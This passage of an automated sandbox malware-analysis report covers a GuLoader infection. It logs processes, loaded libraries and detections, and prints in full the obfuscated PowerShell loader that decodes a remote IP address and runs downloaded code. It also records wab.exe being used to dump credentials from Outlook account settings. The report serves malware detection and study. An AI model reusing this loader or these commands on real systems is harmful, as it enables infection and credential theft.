Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\humjlxyi" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: Binary string: indows\System.Core.pdb* source: powershell.exe, 00000005.00000002.2444255599.00000000076F9000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Sky", "0")
Yara detected GuLoader
Source: Yara match File source: 00000005.00000002.2447423096.000000000B13D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2447272423.00000000089C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2442003706.0000000005E33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2695061689.0000019290072000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Skylining)$global:Juvenolatry = [System.Text.Encoding]::ASCII.GetString($Missis)$global:Caprinic=$Juvenolatry.substring($Substanced,$Destructors)<#Spejlreflekskameraet Reendowment Po
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Baldoquin $Tritheistical $Afgrnsninger113), (Ateisternes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Trrede = [AppDomain]::CurrentDomain.GetAssemblies(
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Menispermum)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Filtrerpapirers, $false).DefineType($Nordstli
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Skylining)$global:Juvenolatry = [System.Text.Encoding]::ASCII.GetString($Missis)$global:Caprinic=$Juvenolatry.substring($Substanced,$Destructors)<#Spejlreflekskameraet Reendowment Po
Obfuscated command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
